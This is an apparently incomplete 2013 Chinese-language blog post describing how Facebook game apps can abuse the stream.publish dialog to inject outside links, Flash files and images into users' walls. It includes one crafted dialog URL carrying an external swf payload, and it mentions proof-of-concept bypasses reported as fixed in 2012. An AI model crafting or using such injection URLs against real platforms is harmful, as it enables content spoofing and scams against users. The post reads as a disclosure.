2013年5月17日 星期五

利用FB小遊戲/APP小遊戲取得玩家資訊 (含影片示範)

利用FB小遊戲/APP小遊戲取得玩家資訊 (含影片示範)

這個騙術手法廣泛應用在Facebook遊戲,或經常發佈app遊戲到FB塗鴉牆的應用程式中。例如:Candy Crush。
其過程為利用FB的語法錯誤提供了將外部連結或外部照片注入(inject)到塗鴉牆,可以出現例如:廣告促銷、某某朋友正在玩某遊戲,等等資訊。

範例及程式碼:
stream.publish 手法說明:
http://fbdevwiki.com/wiki/FB.ui#method:_.27stream.publish.27
File:FB.ui stream.publish.png

所以搭配語法騙術可以修改成以下方式(註:僅為示範,點下去無效):
https://www.facebook.com/dialog/stream.publish?app_id=xxxx&redirect_uri=http%3A%2F%2Fwww.facebook.com%2F&action_links&attachment=%7B%27media%27%3A+[%7B%27type%27:%20%27flash%27,%27swfsrc%27:%27http://files.nirgoldshlager.com/goldshlager2.swf%27,%27imgsrc%27:%27http://www.vectorstock.com/i/composite/41,30/hacked-pc-vector-194130.jpg%27,%27width%27:%27130%27,%27height%27:%27%20130%27,%27expanded_width%27:%27500%27,%27expanded_%20hei

該語法其目的在於取得被害人:
1. app_id
2. attachment 物件參數 (例:swfsr,imgsrc,href)

以下示範了幾種取得被害人 app_id 之後,所進行的詐騙手法:(註:請參考影片,有些FB已經修正了)

PoC Bypass (Fixed By Facebook Security in 2012)


Bug 2 (The “Unfix” Content Spoofing Bug)